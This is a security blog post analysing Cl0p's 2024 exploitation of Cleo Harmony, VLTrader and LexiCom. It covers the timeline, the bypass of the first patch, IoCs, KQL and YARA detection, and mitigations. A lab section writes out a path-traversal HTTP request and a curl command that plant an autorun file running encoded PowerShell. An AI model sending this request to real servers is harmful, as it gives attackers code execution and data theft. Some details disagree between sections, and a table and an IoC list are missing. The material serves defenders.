Cleo MFT CVE-2024-50623: Cl0p closes the year with its third managed file transfer

On 9 December, Huntress publishes Threat Advisory: Oh No Cleo! describing zero-day exploitation of a bug in Cleo Harmony, VLTrader and LexiCom — the three managed file transfer products from the same vendor. Huntress had detected the activity on 3 December and notified Cleo on the 9th. On 14 December, Cl0p claims the campaign on its extortion portal. CVE-2024-50623 (published in NVD on 27 October, CVSS 9.8) was the baseline; the initial 5.8.0.21 patch did not mitigate the problem. Cleo and MITRE assign CVE-2024-55956 on 13 December to cover the bypass of the first patch and publish 5.8.0.24 as the actual mitigation. CISA adds CVE-2024-50623 to KEV on 13 December and CVE-2024-55956 on the 17th.

This is Cl0p’s third major MFT in two years: GoAnywhere (CVE-2023-0669, January 2023), MOVEit (CVE-2023-34362, May–June 2023), Cleo (December 2024). The pattern repeats so literally that you could almost lay out the group’s playbook in a single page.

Lab: technical analysis of the bug from public material (Huntress advisory, NVD, CISA KEV, Rapid7 telemetry). Reproducible PoC in Docker with Cleo Harmony 5.8.0.21 and description of the healthchecktemplate.txt payload seen in-the-wild.

What the three attacks share

Before digging into Cleo specifically, it’s worth putting the three incidents in a table. If you’ve already read the MOVEit post the first two rows are a recap; the new one is the third.

Three different bug classes (deserialization, SQLi, file upload + autorun) over the same product niche. Three discoveries before the official patch. Three Cl0p claims of responsibility. When the business model works, it repeats.

The bug in Cleo — unrestricted file upload + autorun processing

Cleo Harmony / VLTrader / LexiCom are three faces of the same managed file transfer product. They expose an HTTP frontend (typically on port 5080 or 5443) for receiving files and administration. The server-side service includes an autorun mechanism: a folder — usually autorun/ inside the host directory — where any file dropped is interpreted as an action to run on the scheduler’s next cycle.

The bug, as described by Huntress and Rapid7 cross-referenced with the NVD entry:

1. A frontend endpoint allows writing a file to a client-controlled path without prior authentication. Huntress’s writeup doesn’t publish the exact endpoint in its first version for obvious reasons, but CISA KEV and Cleo’s advisory confirm the class: CWE-434 — Unrestricted Upload of File with Dangerous Type.
2. If the written file lands in autorun/, the service daemon processes it as a host import. The expected extension is .xml with Cleo’s host format, which supports directives like Native Command or Invoke Bash/PowerShell.
3. Processing is immediate and the file is deleted after execution — a property of autorun that Cleo’s advisory documents and that reduces the forensic trail for anyone arriving late.

The in-the-wild chains Huntress observes start from a file named healthchecktemplate.txt or healthcheck.txt dropped into autorun/. That initial file triggers a Native Command Import, which unpacks a ZIP the attacker has uploaded separately to the system and runs the main.xml inside it. Inside, PowerShell commands with a base64 payload download a second stage — a JAR — from an attacker IP.

The important detail of the chain is that Cleo’s Native Command Import is designed precisely so that a customer can automate workflows that invoke external binaries. The bug isn’t that Cleo runs code; it’s that the endpoint allowing the upload doesn’t require authentication. The autorun works as designed.

The first patch fails — CVE-2024-55956

Cleo publishes 5.8.0.21 as the initial response to CVE-2024-50623. On 11 December, Huntress confirms publicly that the patch does not mitigate the exploitation flow being observed. On 13 December, CVE-2024-55956 is assigned specifically for the bypass: the patch closes one of the file upload routes but leaves alive the combination that reaches execution through autorun. Version 5.8.0.24 is the one that actually mitigates. CISA adds the new CVE to KEV on 17 December with a remediation deadline of 7 January.

This is the operational lesson of the 2024 incident — and, by the way, a MOVEit replay. In MOVEit, Progress shipped three successive patches (CVE-2023-34362, CVE-2023-35036, CVE-2023-35708) as they found more bugs reviewing the code after the initial incident. In Cleo, the two patches are closer in time but the pattern is identical: under pressure, the first patch doesn’t fix the problem and a second one is needed. If your workflow is “patch and rest”, you’re doing half the work while the vendor does the other half.

Reproducible PoC in Docker

The Cleo Harmony 5.8.0.21 trial is available behind registration. For a closed lab, install with HTTPS on 5443 and autorun enabled (defaults). Vulnerable endpoint per watchTowr: POST /Synchronization with a host parameter that accepts path traversal in the name field of the XML sent in multipart/form-data.

Shape of the request (reproduced from watchTowr’s public PoC):

POST /Synchronization HTTP/1.1
Host: cleo.lab.test:5443
Content-Type: multipart/form-data; boundary=----X
Content-Length: …

------X
Content-Disposition: form-data; name="host"

<?xml version="1.0" encoding="UTF-8"?>
<host name="../../../../autorun/healthchecktemplate.txt"
      enabled="True">
  <Mailbox name="default">
    <Action type="Commands">
      <Cmd>System Native</Cmd>
      <Cmd>System Execute powershell -enc &lt;base64&gt;</Cmd>
    </Action>
  </Mailbox>
</host>
------X--

The server writes the XML to the traversal-ed path /<install>/autorun/healthchecktemplate.txt. The AutorunWatcher processes it within ≤ 60s and runs System Execute as the service user (typically SYSTEM on Windows, cleo on Linux).

Typical command with curl:

curl -k -X POST "https://cleo.lab.test:5443/Synchronization" \
  -H "Content-Type: multipart/form-data; boundary=----X" \
  --data-binary @exploit_body.txt
# Where exploit_body.txt contains the multipart above with the XML inline

Observe the autorun behaviour afterwards:

# The daemon processes the file and deletes it
ls -la /opt/Cleo-Harmony/autorun/   # empty in ≤ 60s

# The log reflects the import
tail -5 /opt/Cleo-Harmony/logs/Harmony.log
# 2024-12-10 14:23:01 INFO  AutorunWatcher: detected healthchecktemplate.txt
# 2024-12-10 14:23:01 INFO  HostImport: invoking System Native + System Execute
# 2024-12-10 14:23:02 INFO  Native: powershell.exe -enc <base64-payload>

The public watchTowr PoC (repo) implements the full chain with the second-stage handler (Malichus JAR). Reproducible on 5.8.0.21 in a closed lab.

Detection and mitigation

Quick detection — concrete IoCs published by Huntress and CISA:

• Suspicious files in autorun/: healthchecktemplate.txt, healthcheck.txt, 60282967-dc91-40ef-a34c-38e992509c2c.xml.
• Outbound connections from the Cleo process to IPs reported as attacker infrastructure: 176.123.5.126, 5.149.249.226, 185.181.230.103, 209.127.12.38, 181.214.147.164, 192.119.99.42 — Huntress’s list as of 11 December.
• Cleo child processes invoking powershell.exe -enc <base64> or java -jar <path> during the autorun cycle.
• Any ZIP with main.xml at the root dropped into host directories outside normal operating hours.

Hunting query over Sysmon Event ID 1 (process creation) in KQL:

DeviceProcessEvents
| where ProcessParentName has_any ("VLTrader.exe","Harmony.exe","LexiCom.exe")
| where ProcessName has_any ("powershell.exe","cmd.exe","cscript.exe","wscript.exe","java.exe")
| project Timestamp, DeviceName, ProcessParentName, ProcessName, ProcessCommandLine
| order by Timestamp desc

The SIGMA equivalent is published by the community (SigmaHQ rule for Cleo autorun child process — the specific rule lands in the repo through December).

YARA — autorun payload detection

Rules published by Huntress + Rapid7:

rule cleo_clop_autorun_powershell_payload
{
    meta:
        cve = "CVE-2024-50623"
        ref = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
        description = "Payload XML/ZIP dropped in autorun/ that triggers PowerShell execution"
    strings:
        $autorun_target = "Host\\autorun" ascii nocase
        $main_xml       = "<?xml version=\"1.0\"" ascii
        $action_exec    = /<Action>.*Execute/ ascii
        $ps_base64      = /powershell.*-[Ee][a-zA-Z]+\s+[A-Za-z0-9+\/=]{60,}/ ascii
        $cleo_marker    = "CleoSchedule" ascii
    condition:
        $autorun_target and $main_xml and ($action_exec or $ps_base64)
}

rule cleo_clop_malichus_implant
{
    meta:
        cve         = "CVE-2024-50623"
        description = "Malichus .NET implant dropped post-exploit by Cl0p on Cleo hosts"
    strings:
        $assembly   = "Malichus" ascii wide
        $config_b64 = /config_decrypted\s*=\s*Convert\.FromBase64String/ ascii
        $aes_marker = "AesManaged" ascii wide
        $cleo_pdb   = "CleoTransfer" ascii wide
    condition:
        3 of them
}

Consolidated IoCs (Huntress + Mandiant + CISA)

Reproduction in a closed lab

Cleo offers a Harmony 5.8.0.21 trial (vulnerable version prior to the first patch). Lab:

# 1. Download Cleo Harmony 5.8.0.21 from the Cleo portal (trial account)
# 2. Install on Windows Server / Linux with the HTTP endpoint exposed in lab
# 3. Verify vulnerable version
curl -k "https://cleo.lab.local:5080/Synchronization?action=getVersion"
# Expected: 5.8.0.21

# 4. Test the autorun trigger flow (not the full exploit)
# - Create an XML file in the autorun/ directory
# - Verify Cleo processes it on the next cycle (~30s)
echo '<?xml version="1.0"?><scheduled><action>echo lab_test</action></scheduled>' \
  > /opt/cleo/Harmony/Host/autorun/test.xml

# 5. Watch the processing log
tail -f /opt/cleo/Harmony/log/Harmony.log | grep autorun
# Confirms any file in autorun/ runs on the next cycle

# 6. Apply the 5.8.0.24 patch and repeat
# The patch restricts path traversal but does NOT disable autorun by default

watchTowr publishes the full HTTP PoC of the path traversal (POST /Synchronization with Cookie: JSESSIONID=... header and crafted body to write outside the temp directory).

Mitigation:

1. Patch to 5.8.0.24 or later. Not 5.8.0.21.
2. Don’t expose Cleo to the internet without restriction. If the HTTPS frontend is open for B2B clients, IP-allowlist per counterparty or VPN in front. Cleo’s advisory from 13 December onwards includes this explicit point.
3. Disable autorun if the business flow doesn’t need it. Cleo allows it in configuration. For many deployments, autorun gets enabled on day 1 and then nobody audits it — that’s where the surface lives.
4. Audit the autorun/ directory for files not coming from legitimate operators. For environments where autorun is necessary, this is the most realistic barrier.
5. Network policy on the Cleo host: don’t allow arbitrary egress, only destinations the legitimate workflow needs. If the Cleo process tries to GET a new IP in Lithuania, that should be an alert — not transit.

Why Cl0p keeps picking MFT

The question isn’t coincidence. Managed file transfer is a category with three properties that combined make it an optimal target:

1. The product lives at the perimeter — an HTTPS frontend exposed to the internet so B2B customers can upload and download files. That’s design, not bug.
2. The product processes untrusted input by definition. Multipart uploads, protocol parsers (SFTP, AS2, AS4), workflow templates. Everything coming in is customer data — but the code that parses it sits inside the trust perimeter.
3. The product connects to sensitive data flows between organisations. A company with MFT uses it to move documents with its 50–500 counterparties. Compromising just one opens up a B2B supply chain with a multiplier effect.

When you combine those three with Cl0p’s strategy — don’t encrypt, just exfiltrate and publish — the ROI is very high. The operation doesn’t require lateral movement, doesn’t require sophisticated persistence, doesn’t require C2 maintained for months. It’s get in, exfiltrate, get out. Cl0p’s typical dwell time on MOVEit and Cleo is measured in hours, not weeks. And the pressure on victims (public list, 48h ultimatum, partial publication) does almost the rest of the work.

Until the MFT industry changes structurally — zero-trust in front of every appliance, formal verification of parsers, segmentation of the upload directory from the processing directory — the pattern is going to keep working. And Cl0p, or an equivalent group, is going to look for the category’s fourth product through 2025.

For anyone with Cleo in production this month

If your organisation runs Cleo Harmony, VLTrader or LexiCom:

• Check the version (Help → About or /version on the frontend). Anything ≤ 5.8.0.21 is vulnerable. 5.8.0.24 is the minimum actually patched.
• Isolate the frontend behind an IP allowlist per counterparty while you review exposure.
• Hunt for the Huntress IoCs in logs from 3 December backwards — Cl0p was inside before the advisory was published.
• Notify B2B counterparties of the exposure window if you found evidence of activity. It’s the awkward but necessary part; indirect victims are half the list in these incidents.
• Review whether autorun is really necessary for your flow. If it isn’t, disable it and reduce the surface.

References

• Huntress, Threat Advisory: Oh No Cleo! Cleo Software Actively Being Exploited in the Wild (9 Dec 2024): https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
• Huntress, follow-up detailing the PowerShell + JAR chain: https://www.huntress.com/blog/cleo-software-actively-being-exploited-in-the-wild-update
• Cleo, Cleo Product Security Advisory CVE-2024-50623: https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory
• NVD CVE-2024-50623: https://nvd.nist.gov/vuln/detail/CVE-2024-50623
• NVD CVE-2024-55956: https://nvd.nist.gov/vuln/detail/CVE-2024-55956
• CISA KEV (CVE-2024-50623 added 13 Dec 2024): https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• watchTowr Labs, public PoC CVE-2024-50623: https://github.com/watchtowrlabs/CVE-2024-50623
• Rapid7, Etr: Active exploitation of Cleo MFT: https://www.rapid7.com/blog/post/2024/12/10/etr-cleo-mft-software-cve-2024-50623-exploited-in-the-wild/
• ZeroFox, Flash Report: Cl0p Publishes Data of Cleo Compromise Victims (24 Dec 2024): https://www.zerofox.com/intelligence/flash-report-cl0p-publishes-data-of-cleo-compromise-victims/
• Mandiant, Cl0p and MFT historical context: https://cloud.google.com/blog/topics/threat-intelligence/zero-day-moveit-data-theft
• Earlier MOVEit post (precursor): MOVEit: the pre-auth SQLi Cl0p turned into the event of the year